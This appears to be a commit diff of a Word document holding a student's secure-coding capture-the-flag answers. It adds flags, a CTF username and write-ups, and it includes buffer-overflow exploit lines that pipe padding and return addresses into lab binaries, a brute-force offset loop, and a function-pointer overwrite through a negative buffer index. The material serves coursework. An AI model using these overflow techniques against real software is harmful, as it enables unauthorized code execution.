<commit_message>
Added 1.7 2.1 2.2 2.4 3.1. 3.2
</commit_message>
<xml_diff>
--- a/Secure Coding CTF Answers.docx
+++ b/Secure Coding CTF Answers.docx
@@ -14,60 +14,28 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">–Vulnerability: Explain the vulnerability in the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>program, and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> explain conceptually how that vulnerability can be exploited to get the flag.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">–Exploit: How did you exploit the vulnerability? List the steps taken and the reasoning behind each step. The TA grading should be able to replicate the exploit following the steps. Feel free to make references to your code! Note </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>that ”use</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> XYZ tool” is not sufficient - you must explain how the tool derived the answer for full credit.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>–References: List resources outside of class material that helped you solve this problem. This includes online video tutorials, other CTF problems on other platforms, etc. Remember that source code avail- able online (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>e.g.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>–Vulnerability: Explain the vulnerability in the program, and explain conceptually how that vulnerability can be exploited to get the flag.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>–Exploit: How did you exploit the vulnerability? List the steps taken and the reasoning behind each step. The TA grading should be able to replicate the exploit following the steps. Feel free to make references to your code! Note that ”use XYZ tool” is not sufficient - you must explain how the tool derived the answer for full credit.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>–References: List resources outside of class material that helped you solve this problem. This includes online video tutorials, other CTF problems on other platforms, etc. Remember that source code avail- able online (e.g. stackoverflow) also needs to be cited.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>–Source code: Append your source code in the same write-up. Your source code should be readable from the write-up PDF itself. Note that this does not count towards the page count above.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stackoverflow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) also needs to be cited.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>–Source code: Append your source code in the same write-up. Your source code should be readable from the write-up PDF itself. Note that this does not count towards the page count above.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -143,15 +111,7 @@
         <w:t>Exploit:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> python -c "print 109*'a' + '\x86\x85\x04\x08'" </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>| .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/vuln</w:t>
+        <w:t xml:space="preserve"> python -c "print 109*'a' + '\x86\x85\x04\x08'" | ./vuln</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -229,15 +189,7 @@
         <w:t>Exploit:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> python -c "print 32*'a'" </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>| .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/vuln</w:t>
+        <w:t xml:space="preserve"> python -c "print 32*'a'" | ./vuln</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -401,8 +353,48 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="3600"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Strings 4 (01-6)</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
@@ -411,6 +403,101 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Strings 5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(01-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4328BD51" wp14:editId="46D88F0D">
+            <wp:extent cx="5943600" cy="476250"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="476250"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -483,15 +570,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">python -c "print 145*'a' + '\x16\x86\x04\x08'" </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>| .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/vuln</w:t>
+        <w:t>python -c "print 145*'a' + '\x16\x86\x04\x08'" | ./vuln</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -523,7 +602,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId8"/>
                     <a:srcRect l="1598" t="7749" r="3795" b="17309"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -562,16 +641,191 @@
       </w:pPr>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Strings 7 (01-7)</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Please connect to the CTF server and solve: Strings 7 (01-7)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>CTF Username:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> node1hometree</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Flag:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>01fa3cb9b61eff51902d93a1e8f53841</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vulnerability: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Exploit:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57680B03" wp14:editId="4D7B5705">
+            <wp:extent cx="5743575" cy="1962150"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="8" name="Picture 8" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Picture 8" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5743575" cy="1962150"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>for((i=0;i&lt;50;i+=1)); do echo $i; python -c "print '500\n'+128*'z'+'01fa'+$i*'z'+'\xc6\x86\x04\x08'" | ./vuln; done</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E4BA2E" wp14:editId="4CC776FD">
+            <wp:extent cx="5429250" cy="1333500"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="Picture 9" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="Picture 9" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5429250" cy="1333500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="center"/>
@@ -667,37 +921,13 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In order to call the win function, its address needed to be loaded into the function pointer. To get to the function pointer’s address however, the buffer needed to be overflowed. By using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gdb’s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> print feature, I found the address of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> variable (</w:t>
+        <w:t>In order to call the win function, its address needed to be loaded into the function pointer. To get to the function pointer’s address however, the buffer needed to be overflowed. By using gdb’s print feature, I found the address of the buf variable (</w:t>
       </w:r>
       <w:r>
         <w:t>0x804a080</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">) and the address of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>funcPtr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">) and the address of the funcPtr </w:t>
       </w:r>
       <w:r>
         <w:t>variable (</w:t>
@@ -706,28 +936,7 @@
         <w:t>0x804a060</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">). When the program asks what location in the buffer I experimented with a few values and printed that index’s address. I found that by entering a “-8” value, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-8]’s address was the same as the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>funcPtr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> variables’.</w:t>
+        <w:t>). When the program asks what location in the buffer I experimented with a few values and printed that index’s address. I found that by entering a “-8” value, buf[-8]’s address was the same as the funcPtr variables’.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -755,7 +964,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -781,7 +990,6 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Then the program asks what you would like in that location. It asks for an integer which it then stores at the previously requested index. In order to give if the address of the win function, the address (0x0</w:t>
       </w:r>
       <w:r>
@@ -797,23 +1005,7 @@
         <w:t>134514150</w:t>
       </w:r>
       <w:r>
-        <w:t>). After the code “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">[x]=y” is executed, the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>funcPtr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> variable is printed and the win function’s address can be seen.</w:t>
+        <w:t>). After the code “buf[x]=y” is executed, the funcPtr variable is printed and the win function’s address can be seen.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -841,7 +1033,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -866,13 +1058,8 @@
       <w:pPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Gdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is then exited and the values of -8 and </w:t>
+      <w:r>
+        <w:t xml:space="preserve">Gdb is then exited and the values of -8 and </w:t>
       </w:r>
       <w:r>
         <w:t>134514150</w:t>
@@ -916,7 +1103,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -959,34 +1146,129 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Please connect to the CTF server and solve: Pointers 2 (02-2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Hint: Read Page 127 (Section 3.5)</w:t>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>CTF Username:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> node1hometree</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Flag:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>b5e08b4453fffb085280ae1b2827b6ac</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Vulnerability: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Exploit:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FE268C" wp14:editId="12082BAD">
+            <wp:extent cx="5943600" cy="709930"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="14" name="Picture 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="709930"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pointers 3 (02-3)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Please connect to the CTF server and solve: Pointers 3 (02-3)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Hint: Read Page 131 (Section 3.7)</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Pointers 3 (02-3)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Please connect to the CTF server and solve: Pointers 3 (02-3)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Hint: Read Page 131 (Section 3.7)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
         <w:t>Pointers 4 (02-4)</w:t>
       </w:r>
     </w:p>
@@ -999,6 +1281,52 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Flag: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>f3d84d569330a987b56d928dbaf17591</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7B8159" wp14:editId="5DED5A36">
+            <wp:extent cx="5943600" cy="1838325"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="7" name="Picture 7" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="Picture 7" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1838325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1008,137 +1336,394 @@
     <w:p>
       <w:r>
         <w:t>Please connect to the CTF server and solve: Pointers 5 (02-5)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Memory 2 (03-2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Please connect to the CTF server and solve: Memory 2 (03-2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Hint: Read Page 194 (Section 4.7)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">python -c "print 109*'a' + '\x86\x85\x04\x08'" </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>| .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/vuln</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>python -c "</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>'134514198\0'</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>'111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>'\xa0\x84\x04\x08'</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">" </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>| .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/vuln</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>python -c "</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>print</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>'</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>80808080808</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:t>+ (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>117*'1'</w:t>
-      </w:r>
-      <w:r>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="3600" w:firstLine="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Memory 1 (03-1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Flag: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>fd720553aed2c56104bfd19970e4c6fc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D366AB" wp14:editId="473BD1D5">
+            <wp:extent cx="5943600" cy="2298065"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="10" name="Picture 10" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
